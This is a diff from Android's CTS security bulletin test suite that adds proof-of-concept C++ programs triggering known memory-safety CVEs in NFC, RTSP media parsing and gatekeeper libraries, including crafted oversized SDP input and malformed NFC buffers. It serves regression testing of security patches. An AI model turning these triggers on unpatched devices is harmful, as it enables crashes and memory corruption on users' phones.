RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +void GKI_freebuf(void *p_buf __attribute__((unused))) {} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *)malloc(sizeof(uint8_t) * 16); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + p_i93->state = RW_I93_STATE_BUSY; + p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY; + p_i93->block_size = I93_MAX_BLOCK_LENGH - 1; + p_i93->sent_cmd = I93_CMD_EXT_GET_SYS_INFO; + p_data->status = NFC_STATUS_OK; + + NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data; + p_resp->len = kLength; + p_resp->offset = 0; + + p_cb->p_cback(0, event, p_data); + free(p_data->data.p_data); + free(p_data); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp new file mode 100644 index 00000000000..f516e6a6280 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2044", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "32", + include_dirs: [ + "frameworks/av/media/libstagefright/rtsp/", + ], + shared_libs: [ + "libmediaplayerservice", + "libstagefright_foundation", + "libutils", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp new file mode 100644 index 00000000000..e733c6f783c --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +#include <stdlib.h> +#include <APacketSource.h> +#include <ASessionDescription.h> + +using namespace android; + +int main(void) { + sp<ASessionDescription> desc = new ASessionDescription; + static const char *raw = + "m=mFormats 20\r\n" + "a=rtpmap:20 MP4V-ES/1/2\r\n" + "a=fmtp:20 config=0000012000004000280020008061616161616161616161616161" + "61616161616161616161616161616161616161616161616161616161616161616161" + "61616161616161616161616161616161616161616161616161616161616161616161" + "616161616161616161616161616161616161616161616161616161\r\n" + "a=range:npt=1.1-2.2\r\n" + "a=framesize:1-9 \r\n" + "a=control:abc\r\n" + "a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n"; + + if(!desc->setTo(raw, strlen(raw))) { + return EXIT_FAILURE; + } + + sp<APacketSource> source = new APacketSource(desc, 1); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp new file mode 100644 index 00000000000..85304bc0f01 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp @@ -0,0 +1,34 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2019-2099", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp new file mode 100644 index 00000000000..8cfa619138f --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp @@ -0,0 +1,122 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <dlfcn.h> +#include <nfa_rw_int.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <stdlib.h> +#include "../includes/common.h" + +#define LENGTH 0xBEB + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +void NFA_Init(tHAL_NFC_ENTRY *p_hal_entry_tbl); +bool nfa_rw_activate_ntf(tNFA_RW_MSG *p_data); + +bool isInitialized = false; + +static void *(*real_memcpy)(void *to, const void *from, size_t numBytes) = nullptr; + +void init(void) { + real_memcpy = (void *(*)(void *, const void *, size_t))dlsym(RTLD_NEXT, "memcpy"); + if (real_memcpy == nullptr) { + return; + } + isInitialized = true; +} + +void *memcpy(void *to, const void *from, size_t numBytes) { + if (!isInitialized) { + init(); + } + if (numBytes == LENGTH) { + exit(EXIT_VULNERABLE); + } + return real_memcpy(to, from, numBytes); +} + +int freeResourcesAndReturn(int status, tNFA_RW_MSG *ptr1 = nullptr, + tNFC_ACTIVATE_DEVT *ptr2 = nullptr, tRW_DATA *ptr3 = nullptr, + NFC_HDR *ptr4 = nullptr, uint8_t *ptr5 = nullptr) { + if (ptr1) { + if (ptr2) { + free(ptr2); + } + free(ptr1); + } + if (ptr3) { + if (ptr4) { + free(ptr4); + } + free(ptr3); + } + if (ptr5) { + free(ptr5); + } + return status; +} + +int main() { + GKI_init(); + rw_init(); + tHAL_NFC_ENTRY p_hal_entry_tbl; + NFA_Init(&p_hal_entry_tbl); + + tNFA_RW_MSG *p_data = (tNFA_RW_MSG *)malloc(sizeof(tNFA_RW_MSG)); + if (!p_data) { + return EXIT_FAILURE; + } + p_data->activate_ntf.p_activate_params = + (tNFC_ACTIVATE_DEVT *)malloc(sizeof(tNFC_ACTIVATE_DEVT)); + if (!(p_data->activate_ntf.p_activate_params)) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data); + } + + tNFC_ACTIVATE_DEVT *p_activate_params = p_data->activate_ntf.p_activate_params; + p_activate_params->protocol = NFC_PROTOCOL_T2T; + + nfa_rw_activate_ntf(p_data); + + tRW_CBACK *p_cback = rw_cb.p_cback; + tRW_DATA *p_rw_data = (tRW_DATA *)malloc(sizeof(tRW_DATA)); + if (!p_rw_data) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params); + } + + nfa_rw_cb.cur_op = NFA_RW_OP_READ_NDEF; + p_rw_data->data.p_data = (NFC_HDR *)malloc(sizeof(NFC_HDR)); + if (!(p_rw_data->data.p_data)) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params, + p_rw_data); + } + + nfa_rw_cb.p_ndef_buf = (uint8_t *)malloc(sizeof(uint8_t)); + if (!(nfa_rw_cb.p_ndef_buf)) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params, + p_rw_data, p_rw_data->data.p_data); + } + + p_rw_data->data.p_data->len = LENGTH; + if (p_cback) { + p_cback(RW_T3T_CHECK_EVT, p_rw_data); + } + + return freeResourcesAndReturn(EXIT_SUCCESS, p_data, p_data->activate_ntf.p_activate_params, + p_rw_data, p_rw_data->data.p_data, nfa_rw_cb.p_ndef_buf); +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp new file mode 100644 index 00000000000..4052106c755 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp @@ -0,0 +1,30 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2115", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + include_dirs: [ + "system/gatekeeper/include/gatekeeper/", + ], + shared_libs: [ + "libgatekeeper", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp new file mode 100644 index 00000000000..9ddc0e16c3a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp @@ -0,0 +1,106 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#define private public + +#include "../includes/common.h" +#include "gatekeeper.h" + +using namespace gatekeeper; + +bool isVulnerable = false; +const uint8_t *authTokenKey = nullptr; + +void *operator new(decltype(sizeof(0)) n) noexcept(false) { return malloc(n); } + +void operator delete(void *ptr) throw() { + if (ptr == authTokenKey) { + isVulnerable = true; + } + if (!ptr) { + free(ptr); + } +} + +class DerivedGateKeeper : public GateKeeper { + protected: + bool GetAuthTokenKey(const uint8_t **auth_token_key, + uint32_t *length __attribute__((unused))) const { + *auth_token_key = (const uint8_t *)(new uint8_t()); + authTokenKey = *auth_token_key; + return true; + } + void GetPasswordKey(const uint8_t **password_key __attribute__((unused)), + uint32_t *length __attribute__((unused))) {} + void ComputePasswordSignature(uint8_t *signature __attribute__((unused)), + uint32_t signature_length __attribute__((unused)), + const uint8_t *key __attribute__((unused)), + uint32_t key_length __attribute__((unused)), + const uint8_t *password __attribute__((unused)), + uint32_t password_length __attribute__((unused)), + salt_t salt __attribute__((unused))) const {} + void GetRandom(void *random __attribute__((unused)), + uint32_t requested_size __attribute__((unused))) const {} + void ComputeSignature(uint8_t *signature __attribute__((unused)), + uint32_t signature_length __attribute__((unused)), + const uint8_t *key __attribute__((unused)), + uint32_t key_length __attribute__((unused)), + const uint8_t *message __attribute__((unused)), + const uint32_t length __attribute__((unused))) const {} + uint64_t GetMillisecondsSinceBoot() const { return EXIT_SUCCESS; } + bool GetFailureRecord(uint32_t uid __attribute__((unused)), + secure_id_t user_id __attribute__((unused)), + failure_record_t *record __attribute__((unused)), + bool secure __attribute__((unused))) { + return false; + } + bool ClearFailureRecord(uint32_t uid __attribute__((unused)), + secure_id_t user_id __attribute__((unused)), + bool secure __attribute__((unused))) { + return false; + } + bool WriteFailureRecord(uint32_t uid __attribute__((unused)), + failure_record_t *record __attribute__((unused)), + bool secure __attribute__((unused))) { + return false; + } + uint32_t ComputeRetryTimeout(const failure_record_t *record __attribute__((unused))) { + return EXIT_SUCCESS; + } + virtual bool IsHardwareBacked() const { return false; } + bool DoVerify(const password_handle_t *expected_handle __attribute__((unused)), + const SizedBuffer &password __attribute__((unused))) { + return false; + } +}; + +int main() { + uint8_t *auth_token = new uint8_t(); + uint32_t length = sizeof(uint32_t); + SizedBuffer *sb = new SizedBuffer(auth_token, length); + uint64_t timestamp = 1; + secure_id_t user_id = 1; + secure_id_t authenticator_id = 1; + uint64_t challenge = 0; + + DerivedGateKeeper *object = new DerivedGateKeeper(); + object->MintAuthToken(sb, timestamp, user_id, authenticator_id, challenge); + + delete auth_token; + delete object; + delete sb; + return (isVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp index a7eef920cbd..eb42b96323f 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp @@ -22,9 +22,6 @@ cc_test { "poc.cpp", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { include_dirs: [ "packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/", @@ -39,7 +36,6 @@ cc_test { shared_libs: [ "libnfc_nci_jni", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp index 3bbda28f506..c8353feb305 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp @@ -22,9 +22,6 @@ cc_test { "poc.cpp", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { include_dirs: [ "packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/", @@ -39,7 +36,6 @@ cc_test { shared_libs: [ "libnfc_nci_jni", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp new file mode 100644 index 00000000000..1166510586a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE_2019_2135", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/nfa/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/include/", + "system/nfc/src/gki/ulinux/", + "packages/apps/Nfc/nci/jni/extns/pn54x/src/common/", + "packages/apps/Nfc/nci/jni/extns/pn54x/inc/", + ], + shared_libs: [ + "libnfc_nci_jni", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp new file mode 100644 index 00000000000..582ddb8c9d8 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp @@ -0,0 +1,40 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfa_api.h> +#include <nfc_api.h> +#include <phNfcTypes.h> +#include <phNxpExtns.h> + +static void nfaMockDMCallback(uint8_t, tNFA_DM_CBACK_DATA *) {} +static void nfaMockCCallback(uint8_t, tNFA_CONN_EVT_DATA *) {} + +int main(void) { + if (EXTNS_Init(nfaMockDMCallback, nfaMockCCallback) != NFCSTATUS_SUCCESS) { + return EXIT_FAILURE; + } + const int32_t size = 16; + const int32_t offset = size - 1; + uint8_t *p_data = static_cast<uint8_t *>(malloc(size)); + if (p_data == nullptr) { + return EXIT_FAILURE; + } + p_data[offset] = 0x60; + EXTNS_MfcTransceive(&p_data[offset], 1); + free(p_data); + EXTNS_Close(); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp new file mode 100644 index 00000000000..55a41e311ba --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2206", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + "libchrome", + "libbase", + "liblog", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp new file mode 100644 index 00000000000..f40a7f20c8a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp @@ -0,0 +1,123 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <stdlib.h> +#include <tags_defs.h> + +#define RWLENGTH 32 +#define PLENGTH 1 +#define OFFSET 7 + +// borrowed from rw_i93.cc +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +void GKI_freebuf(void *p_buf __attribute__((unused))) {} + +void GKI_start_timer(uint8_t, int32_t, bool) {} + +void GKI_stop_timer(uint8_t) {} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = + (NFC_HDR *)malloc(sizeof(uint8_t) * (OFFSET + PLENGTH) * 2); + + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + p_i93->state = RW_I93_STATE_SET_READ_ONLY; + p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC; + p_i93->block_size = 1; + + p_i93->ndef_tlv_start_offset = 0; + p_i93->rw_length = RWLENGTH; + p_i93->ndef_length = p_i93->rw_length * 2; + + p_data->status = NFC_STATUS_OK; + NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data; + p_resp->len = PLENGTH; + p_resp->offset = OFFSET; + + p_cb->p_cback(0, event, p_data); + + free(p_data->data.p_data); + free(p_data); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp new file mode 100644 index 00000000000..114756431a4 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2207", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp new file mode 100644 index 00000000000..f94ee94d10f --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp @@ -0,0 +1,36 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "nfa_hci_defs.h" +#include "nfa_hci_int.h" +#define SIZE 16 + +extern tNFA_HCI_CB nfa_hci_cb; + +int main() { + nfa_hci_cb.cmd_sent = NFA_HCI_ANY_GET_PARAMETER; + nfa_hci_cb.param_in_use = NFA_HCI_HOST_LIST_INDEX; + uint8_t data_len = SIZE * 6; + uint8_t *data = (uint8_t *)malloc(SIZE); + if (!data) { + return EXIT_FAILURE; + } + nfa_hci_handle_admin_gate_rsp(data, data_len); + free(data); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp index f388f89ef39..720a76d2b9d 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp @@ -20,135 +20,60 @@ #define MAX_PARAMETER_SETS (9) #define MAX_NUM_OTT (5) - -#define RETURN_EXIT_FAILURE_IF_NULL(ptr) \ - { \ - if (!ptr) { \ - return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_FAILURE); \ - } \ - } +#define ARR_SIZE (16) typedef signed char SCHAR; -int freeAllocatedMemoryAndReturn(SPATIAL_BS_FRAME *frame, spatialDec *decoder, - int errorCode) { - if (frame) { - if (frame->CLDLosslessData) { - for (int i = 0; i < MAX_NUM_OTT; ++i) { - if ((&frame->CLDLosslessData[i])->state) { - free((&frame->CLDLosslessData[i])->state); - (&frame->CLDLosslessData[i])->state = nullptr; - } - } - free(frame->CLDLosslessData); - frame->CLDLosslessData = nullptr; - } - if (frame->ICCLosslessData) { - free(frame->ICCLosslessData); - frame->ICCLosslessData = nullptr; - } - if (frame->IPDLosslessData) { - free(frame->IPDLosslessData); - frame->IPDLosslessData = nullptr; - } - free(frame); - frame = nullptr; - } - - if (decoder) { - if (decoder->pConfigCurrent) { - free(decoder->pConfigCurrent); - decoder->pConfigCurrent = nullptr; - } - if (decoder->ottCLDidxPrev) { - free(decoder->ottCLDidxPrev); - decoder->ottCLDidxPrev = nullptr; - } - if (decoder->smgTime) { - free(decoder->smgTime); - decoder->smgTime = nullptr; - } - if (decoder->smgData) { - free(decoder->smgData); - decoder->smgData = nullptr; - } - if (decoder->smoothState) { - 